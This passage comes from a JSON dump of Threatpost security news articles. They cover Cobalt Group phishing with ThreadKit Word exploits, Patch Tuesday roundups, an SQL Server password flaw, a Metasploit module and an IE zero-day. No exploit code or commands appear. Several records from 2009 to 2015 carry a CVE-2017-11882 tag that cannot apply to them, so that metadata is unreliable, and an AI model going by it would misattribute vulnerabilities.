domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "cvss3": {}, "published": "2018-05-28T12:21:42", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:15:20", "description": "Despite the high profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments including:\n\n * Despite an arrest earlier this year of a key member, of the Cobalt Group remains active.\n * A new version on the malware ThreadKit is being actively distributed in October 2018.\n * The CobInt trojan uses a XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In one single campaign, it was credited for stealing over $32,000 from six Eastern Europe ATMs. In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when the EUROPOL [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technology](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0 **\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and one notably being [the now patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing a RFT Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into it\u2019s own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out the update including a new download URL where the malware code \u201cobjects\u201d are downloaded from and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills **\n\nThe ThreadKit payload is the trojan Coblnt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, a XOR routine used to decode the initial Coblnt payload. A XOR, or XOR cipher, is an encryption algorithm that operates on a set of known principles. Encryption and decryption can be performed by applying and reapplying the XOR function.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt group members have only temporarily slowed Carbanak/Cobalt threat actors. In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "cvss3": {}, "published": "2018-12-11T18:40:00", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:09:40", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054308/sql1.jpg)](<https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/>)There is an unpatched flaw in Microsoft SQL Server that could enable an attacker to access users\u2019 passwords on the database server. The vulnerability is in SQL Server 2000, 2005 and 2008.\n\nThe SQL Server vulnerability was discovered last fall by database-security vendor Sentrigo, which then reported the problem to Microsoft. But the software giant did not consider the problem serious enough to warrant a patch, Sentrigo officials said, so the weakness has remained unpatched for nearly a year. Sentrigo has released a [free software tool](<http://www.sentrigo.com/passwords>) that will address the problem, though it does not patch the vulnerability.\n\nThe tool, called Passwordizer, erases the cleartext passwords from the database server.\n\nIn a statement, Microsoft officials said the company is not planning to patch the flaw and does not see it as a problem that requires a security update.\n\nThe flaw lies in the way that SQL Server handles user passwords. By looking at the process memory, an administrator can see other users\u2019 passwords in cleartext. However, in order to see the process memory dump, a user would have to have administrator rights already, a condition that limits the severity of the bug.\n\n\u201cDevelopers go to great lengths to ensure passwords are not even transmitted in clear text (for example at the time of login), let alone stored in a readable form. Users have come to expect that their personal passwords, are exactly that \u2013personal \u2013 and that not even administrators can see them. Exploiting this vulnerability, an administrator will be able to see the passwords of users and applications that have connected to SQL Server, all the way back to the last restart,\u201d said Slavik Markovich, CTO of Sentrigo. \u201cWe respectfully disagree with Microsoft\u2019s view that since it requires administrative privileges, the risk is mitigated. Even if you trust your admins, there are plenty of hackers capable of gaining escalated privileges, who could now easily access other systems across the network using these passwords.\u201d\n\nThe flaw can be exploited remotely in SQL Server 2000 and 2005, but in SQL Server 2008 Microsoft made a change to make it more difficult for administrators to access the memory, so an attacker would need local access to the machine in that case.\n", "cvss3": {}, "published": "2009-09-02T12:30:49", "type": "threatpost", "title": "New Unpatched Flaw Surfaces in SQL Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "href": "https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/73026/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:50", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060130/windows_patch_92.jpg)](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>)This month\u2019s batch of security patches from Microsoft will be a record-breaking one: 16 bulletins addressing a whopping 49 security vulnerabilities. \n\nAccording to the company\u2019s advance notice, four of the 16 bulletins will be rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Microsoft rates a critical vulnerability as one that could be exploited to propagate an Internet worm without user action. \n\nThe 49 vulnerabilities will mark the largest ever batch of patches issued by Microsoft. The previous record was 34 vulnerabilities patched in August this year.\n\nThe October patch batch will include fixes for security flaws in the Windows operating system, the Internet Explorer browser, Microsoft Office and the .NET Framework.\n\nIt is very likely that Microsoft will include patches for a pair of elevation of privilege vulnerabilities that were exploited during the mysterious Stuxnet worm attack.\n\nThe flaws in this month\u2019s release affect all version of Windows, including the newest Windows 7 and Windows Server 2008.\n", "cvss3": {}, "published": "2010-10-07T18:43:29", "type": "threatpost", "title": "Microsoft Plans Record-Breaking Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:21:27", "id": "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "href": "https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/74560/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:10", "description": "Microsoft\u2019s monthly release of security bulletins today is a relatively light load of patches to be tested and deployed. The real news, however, could be in a separate advisory in which it continues to deprecate the outdated RC4 encryption algorithm.\n\nFollowing its initial advisory in May that applied to the .NET framework, today\u2019s move [extends RC4 deprecation](<https://support.microsoft.com/en-us/kb/2978675>) to Windows 10 systems that are running .NET Framework 3.5 applications and systems with .NET Framework 4.6 installed that are running .NET Framework 4.5/4.5.1/4.5.2 applications.\n\nThe advisory also updates the default transport encryption in Windows to TLS 1.2.\n\nThe move is timely as the industry continues to move away from weakened encryption. For example, a recent academic paper projects that the time to arrive at a [practical SHA-1 collision attack](<https://threatpost.com/practical-sha-1-collision-months-not-years-away/114979/>) can now be measured in months, not years. Continuous improvements to processing speeds and availability and tweaks to existing attacks put weak encryption within reach of well funded criminal or state-sponsored operations.\n\nAs for today\u2019s half-dozen security bulletins, Microsoft has rated three of them as critical, including the ubiquitous Internet Explorer rollup and patches for remote code execution vulnerabilities in the VBScript and Jscript engines in Windows.\n\nFour vulnerabilities are addressed in [MS15-108](<https://technet.microsoft.com/en-us/library/security/MS15-108>), none of which have been publicly disclosed; Microsoft said it also not aware of public exploits.\n\nMicrosoft said attackers could host an exploit online or phish users with a malicious ActiveX control embedded in an Office document that uses the Internet Explorer rendering engine to redirect users to the malicious website.\n\nThe vulnerabilities affect Vista, Windows Server 2008 and Server Core installations of Windows Server 2008 R2. Today\u2019s update patches two separate scripting enginer memory corruption vulnerabilities, an information disclosure flaw and an ASLR bypass.\n\n\u201cThe update addresses the vulnerabilities by modifying how the VBScript and JScript scripting engines handle objects in memory, and helping to ensure that affected versions of VBScript properly implement the ASLR security feature,\u201d Microsoft said in its advisory.\n\n\u201cWith the number of JScript and VBscript related vulnerabilities addressed this month, Microsoft needs to adopt a disabled by default strategy with those technologies until they can be removed entirely,\u201d said Core Security systems engineer Bobby Kuzma. \u201cUnfortunately that will never happen, due to the huge legacy application technical debt held by large organizations and governments worldwide.\u201d\n\nMicrosoft also patched 14 vulnerabilities in Internet Explorer and two more in Microsoft Edge browser for Windows 10 systems.\n\nMost of the IE update addresses memory corruption vulnerabilities in [MS15-106](<https://technet.microsoft.com/library/security/MS15-106>) along with a handful of privilege elevation and information disclosure flaws. There is also some overlap with the VBScript and Jscript bulletin, since IE is the principal attack vector there. One of the IE bugs, reported by researchers at FireEye, has been publicly disclosed, but none of the flaws have been exploited in the wild, Microsoft said.\n\nThe Microsoft Edge bulletin, [MS15-107](<https://technet.microsoft.com/library/security/MS15-107>), is rated moderate and takes care of a vulnerability that enables bypass of the browser\u2019s cross-site scripting filter, and a separate information disclosure vulnerability.\n\nThe remaining critical bulletin patches a remote code execution vulnerability in Windows Shell.\n\n\u201cThe vulnerabilities could allow remote code execution if a user opens a specially crafted toolbar object in Windows or an attacker convinces a user to view specially crafted content online,\u201d Microsoft said in advisory [MS15-109](<https://technet.microsoft.com/library/security/MS15-109>).\n\nThe remaining bulletins are rated important by Microsoft.\n\n[MS15-110](<https://technet.microsoft.com/library/security/MS15-110>) patches three remote code execution vulnerabilities in Microsoft Office, all of which are memory corruption flaws, while [MS15-111](<https://technet.microsoft.com/library/security/MS15-111>) is a Windows kernel update that patches five vulnerabilities, including three different privilege elevation flaws, a memory corruption issue, and a Trusted Boot bypass.\n", "cvss3": {}, "published": "2015-10-13T14:39:57", "type": "threatpost", "title": "October 2015 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-14T20:03:27", "id": "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "href": "https://threatpost.com/microsoft-releases-six-bulletins-continues-rc4-deprecation/115017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:30", "description": "As the inquiry into who [leaked the proof-of-concept exploit code for the MS12-020 RDP flaw](<https://threatpost.com/exploit-ms12-020-rdp-bug-moves-metasploit-032012/>) continues, organizations that have not patched their machines yet have a new motivation to do so: A Metasploit module for the vulnerability is now available. \n\nIt\u2019s been a week now since Microsoft released a patch for the RDP bug and the exploit code that was included with the information the company sent to its partners in MAPP (Microsoft Active Protections Program) was found in an exploit on a Chinese download site shortly thereafter. Luigi Auriemma, the researcher who discovered and reported the vulnerability to Microsoft through the TippingPoint Zero Day Initiative, said that the packet found in the exploit code that leaked was a direct copy of the one he submitted with his bug report. \n\nOfficials at ZDI said that they are certain that the code did not leak from their organization. Microsoft officials have said little more than to acknowledge that there seems to be a leak from somewhere within MAPP. The company has not indicated whether that was on their end or from one of the MAPP members. \n\nNow, there is a working exploit committed to the [Metasploit Framework](<http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids>), which is a typically a good indicator that attacks are about to ramp up. Brad Arkin, head of product security and privacy at Adobe, said in a talk recently that when there\u2019s a newly public vulnerability in one of the company\u2019s products, the attacks start with a trickle against high value targets and then increase sharply from there.\n\n\u201cThe biggest jump in exploits we see is right after the release of a Metasploit module,\u201d he said. \u201cWe\u2019ll see a few attacks a day before that and then it will spike to five thousand a day, and it goes up from there. There\u2019s a correlation between the broader availability of an exploit and more people getting attacked.\u201d\n\nThe exploit in Metasploit, like the one that has been circulating online, causes a denial-of-service condition on vulnerable machines. Researchers have been working on developing a working remote code execution exploit for the bug, as well, but none has surfaced publicly yet.\n", "cvss3": {}, "published": "2012-03-20T18:08:49", "type": "threatpost", "title": "Exploit For Ms12-020 RDP Bug Moves to Metasploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:35", "id": "THREATPOST:E067CFBFA163616683563A8ED34648FE", "href": "https://threatpost.com/exploit-ms12-020-rdp-bug-moves-metasploit-032012/76346/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054449/ie7_flaw.jpg)](<https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/>)There is a newly discovered vulnerability in both Internet Explorer 6 and Internet Explorer 7 that could enable an attacker to take complete control of a vulnerable machine.\n\nThe vulnerability is the result of a dangling pointer in IE and there is a working exploit for the flaw circulating online. The flaw lies in the way that Internet Explorer handles CSS data. [CSS](<http://www.w3.org/Style/CSS/>) is a technology that\u2019s used in many sites to help present information in an organized manner. Specifically, the vulnerability is in the mshtml.dll, the Microsoft HTML Viewer.\n\nAccording to an [analysis by Vupen Security](<http://www.vupen.com/english/advisories/2009/3301>), an attacker could exploit the flaw either to crash a vulnerable version of IE, or to run arbitrary code on the user\u2019s machine. There is no patch available for the vulnerability. The SANS Internet Storm Center also has an analysis up.\n\nA vulnerability has been identified in Microsoft Internet Explorer, \nwhich could be exploited by attackers to compromise a vulnerable \nsystem. This issue is caused by a dangling pointer in the Microsoft \nHTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via \nthe \u201cgetElementsByTagName()\u201d method, which could allow attackers to \ncrash an affected browser or execute arbitrary code by tricking a user \ninto visiting a malicious web page.\n\nAn [exploit for the vulnerability in IE](<http://www.securityfocus.com/archive/1/507984/30/0/threaded>) was published on the Bugtraq mailing list Friday, but experts say it is not very reliable at this point. However, the level of detail included in the Bugtraq post will likely lead to the release of a more reliable exploit soon. In lieu of a patch, users should disable JavaScript in IE to prevent exploitation.\n\nMicrosoft has not yet published any advisories on the new IE vulnerability.\n", "cvss3": {}, "published": "2009-11-22T21:47:10", "type": "threatpost", "title": "New Zero-Day Flaw Discovered in IE7", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:05:16", "id": "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "href": "https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/73151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:45", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054213/adam_shostack_.jpg)](<https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/>)\n\nDennis Fisher talks with Microsoft\u2019s Adam Shostack about the [Privacy Enhancing Technologies Symposium](<http://petsymposium.org/2009/program.php>), the definition of privacy in today\u2019s world and the role of technology in helping to enhance and protect that privacy.\n\nShow notes: Adam\u2019s [blog post on \u201cUnderstanding Privacy\u201d](<http://www.emergentchaos.com/archives/2008/08/solves_understanding_priv.html>) by Dan Solove.\n\nMicrosoft\u2019s [Privacy Guidelines for Developing Software Products and Services](<http://www.microsoft.com/downloads/details.aspx?FamilyId=C48CF80F-6E87-48F5-83EC-A18D1AD2FC1F&displaylang=en>).\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_261.mp3>)\n\nSubscribe to the Digital Underground podcast on [**![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054213/itunes_button399.jpg)**](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-08-13T20:34:53", "type": "threatpost", "title": "Adam Shostack on Privacy and the PETS '09 Workshop", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "href": "https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/72968/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:26", "description": "![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053310/windows_cofee1.jpg)Microsoft has announced plans to give away free versions of its COFEE (Computer Online Forensic Evidence Extractor) utility to help law enforcement agencies in cyber-crime investigations. \n\nCOFEE uses digital forensic technologies to help investigators gather evidence of live computer activity at the scene of a crime, regardless of technical expertise. \n \nLaw enforcement agents with less than 10 minutes training can capture live evidence of illegal activity by inserting the COFEE USB device into a computer. \n\nThe evidence is then preserved for analysis, protecting it from being destroyed when the computer is turned off for moving. \n\nMicrosoft explains:\n\n> A common challenge of cybercrime investigations is the need to conduct forensic analysis on a computer before it is powered down and restarted. Live evidence, such as some active system processes and network data, is volatile and may be lost while a computer is turning off. This evidence may contain information that could assist in the investigation and prosecution of a crime. With COFEE, a front-line officer doesn\u2019t have to be a computer expert to capture this volatile information before turning off the computer on the scene for later analysis. An officer with minimal computer experience can be tutored to use a pre-configured COFEE device in less than 10 minutes. This enables him or her to take advantage of common digital forensics tools the experts use to gather important volatile evidence while doing little more than simply inserting a USB device into the computer.\n\n[Read the full announcement](<http://www.microsoft.com/presspass/press/2009/oct09/10-13cofeepr.mspx>) [microsoft.com] \n", "cvss3": {}, "published": "2009-10-19T18:59:24", "type": "threatpost", "title": "Free COFEE Helps Law Enforcement Forensics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:24:46", "id": "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "href": "https://threatpost.com/free-cofee-helps-law-enforcement-forensics-101909/72343/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "As expected, Microsoft delivered a patch today for a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) that was disclosed by HP\u2019s Zero Day Initiative three weeks ago, six months after it was reported to the ZDI.\n\nThe IE8 patch, [MS14-035](<https://technet.microsoft.com/library/security/ms14-035>), is included in a cumulative Internet Explorer rollup that patches 59 flaws in the browser. Most of them are remote-code execution bugs rolling all the way back to IE 6 running on Windows Server 2003 SP2.\n\nThe zero day affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. Microsoft said in May that it was aware of the issue.\n\n\u201cAlthough no attacks have been detected in the wild, the ZDI advisory has given attackers a head start understanding this vulnerability, possibly reducing the time required for researchers to reverse engineer the fix and devise exploit code,\u201d said Craig Young, a security researcher with Tripwire.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nExperts are urging IT administrators to take a close look at a bulletin for Microsoft Word, [MS14-034](<https://technet.microsoft.com/library/security/ms14-034>), which while rated important by Microsoft, should be the next highest patching priority behind IE.\n\nAffecting Microsoft Word 2007, users could be exposed to remote code execution exploits if a malicious Word document is opened on a vulnerable computer.\n\n\u201cMicrosoft rates it only \u2018important\u2019 because user interaction is required\u2014one has to open a Word file\u2014but it allows the attacker Remote Code Execution. In addition, attackers have become quite skilled at tricking users into opening files,\u201d said Qualys CTO Wolfgang Kandek. \u201cWho wouldn\u2019t open a document that brings new information about the company\u2019s retirement plan? The Word vulnerability is in the newer DOCX file format and only applies to the 2007 release. If you are using the newer versions of Office/Word 2010 or 2013 you are not affected.\u201d\n\nThe second critical bulletin, [MS14-036](<https://technet.microsoft.com/library/security/ms14-036>), patches remote code execution bugs in Microsoft graphics in Office and Lync that could be exploited by users visiting malicious webpages or opening a malicious Office file.\n\n\u201cGraphics parsing requires complex logic and has frequently been associated with attack vectors,\u201d said Kandek. \u201cIt affects Windows, Office and the Lync IM client because they all bring their own copy.\u201d\n\nThis month bring 2014\u2019s total number of bulletins issued by Microsoft to 36, well below last year\u2019s pace of 46 through June.\n\n\u201cWe have become accustomed to see around 100 security bulletins for Microsoft products a year, but it looks as if we are in for fewer this year. This runs counter to the general tendency of the year which has already seen its shares of big breaches, 0-days and the big Heartbleed vulnerability in OpenSSL,\u201d Kandek said. \u201cMaybe the reduced count is based on the increased presence of vulnerability brokers that buy up vulnerabilities for internal use? We will see how the second part of the year develops.\u201d\n\nThe remaining bulletins are rated important and include a pair of information disclosure bugs, one denial of service flaw and a tampering vulnerability.\n\n * [MS14-033](<https://technet.microsoft.com/library/security/ms14-033>) addresses an information disclosure vulnerability in Microsoft XML Core Serivces; an exploit on a website designed to invoke XML Core Services through IE could leak data to an attacker.\n * [MS14-032](<https://technet.microsoft.com/library/security/ms14-032>) also patches an information disclosure bug in Microsoft Lync Server. A user tricked into joining a Lync meeting by clicking on a malicious meeting URL could be exploited.\n * [MS14-031](<https://technet.microsoft.com/library/security/ms14-031>) fixes a denial-of-service bug in TCP. An attacker sending a malicious sequence of packets to the target system could cause it to crash.\n * [MS14-030](<https://technet.microsoft.com/library/security/ms14-030>) patches a vulnerability in Remote Desktop that could allow tampering, Microsoft said. If an attacker has man in the middle access to the same network segment as the targeted system during an RDP session and sends malicious RDP packets, they could exploit the vulnerability.\n\n**Adobe Patches Flash Player**\n\nAdobe released a new version of Flash Player that addresses a [critical vulnerability](<http://helpx.adobe.com/security/products/flash-player/apsb14-16.html>) in the software.\n\nFlash 13.0.0.214 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.359 and earlier versions for Linux are affected.\n\nAdobe said there are no active exploits against these vulnerabilities.\n", "cvss3": {}, "published": "2014-06-10T14:09:16", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday security updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-13T15:41:16", "id": "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "href": "https://threatpost.com/microsoft-patches-ie8-zero-day-critical-word-bug/106572/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:58", "description": "There\u2019s an odd bit of behavior that some Windows systems will exhibit when certain kinds of installers are launched, automatically elevating the privileges of the installer process to system-level privileges. In theory, the issue shouldn\u2019t be exploitable because at one point in the process the system will generate an MD5 hash of a DLL that\u2019s to be loaded, and unless the attacker can replace that DLL with a malicious one that sports the same hash, an attack is impossible. But those constraints may not hold for all attackers, a researcher says.\n\nThe weirdness in Windows 7 and Windows Server 2008 was identified by Cesar Cerrudo of IOActive, and he spent some time looking into exactly what causes it and whether he\u2019d be able to exploit the condition. The issue arises when an installer for a program that is already installed on a given machine is executed. When one of those installers is run, it will automatically elevate the privileges of the current installer process to the System level. That would theoretically give an attacker a local elevation of privilege bug, granting him system privileges.\n\n\u201cHowever, an interesting issue arises during the installation process when running this kind of installer: a temporary file is created in `C:UsersusernameAppDataLocalTemp`, which is the temporary folder for the current user. The created file is named `Hx????.tmp `(where `????` seem to be random hex numbers), and it seems to be a COM DLL from Microsoft Help Data Services Module, in which its original name is `HXDS.dll`. This DLL is later loaded by `msiexec.exe` process running under the System account that is launched by the Windows installer service during the installation process,\u201d [Cerrudo wrote in a blog post](<http://blog.ioactive.com/2012/01/free-windows-vulnerability-for-nsa.html?m=1>) explaining the issue.\n\n\u201cWhen the DLL file is loaded, the code in the DLL file runs as the System user with full privileges. At first sight this seems to be an elevation of privileges vulnerability since the folder where the DLL file is created is controlled by the current user, and the DLL is then loaded and run under the System account, meaning any user could run code as the System user by replacing the DLL file with a specially-crafted one before the DLL is loaded and executed.\u201d\n\nBut there\u2019s more to it than just that. In order to exploit the weakness, Cerrudo said that an attacker likely would need to create a malicious DLL with the same MD5 hash as the benign one and then replace the original one with the DLL containing the exploit code. The attack in this case would be against the MD5 algorithm itself, because the attacker would need to create a second message with the same hash as the known message. Known as a second preimage attack, it is practically out of reach for most individual attackers.\n\nHowever, Cerrudo says that it may well be possible for an organization such as an intelligence agency that has massive amounts of compute power and resources to be able to execute such an attack. MD5 is known to have a variety of weaknesses, including collision problems, and Microsoft itself stopped including it in its products seven years ago. Cerrudo said that while exploiting the issue he found via a second preimage attack is likely impractical for most attackers, there may be other vectors out there that could accomplish the same task.\n\n\u201cI think that there could be others. I dedicated some time to it, I did research and tried different ways to exploit the issue but this doesn\u2019t mean that I exhausted all possibilities. It\u2019s just a matter of dedicating some time and trying different options like combining this issue with others, abusing some Windows Installer functionality, timing and blocking issues, etc. These are the kind of things I would try if I would have time. I wouldn\u2019t discard that someone can come up with an idea to exploit it,\u201d Cerrudo said via email.\n", "cvss3": {}, "published": "2012-01-18T15:20:13", "type": "threatpost", "title": "Elevating Privileges Via Windows Installers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:58", "id": "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "href": "https://threatpost.com/elevating-privileges-windows-installers-011812/76111/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:50", "description": "Microsoft didn\u2019t beat around the bush when it 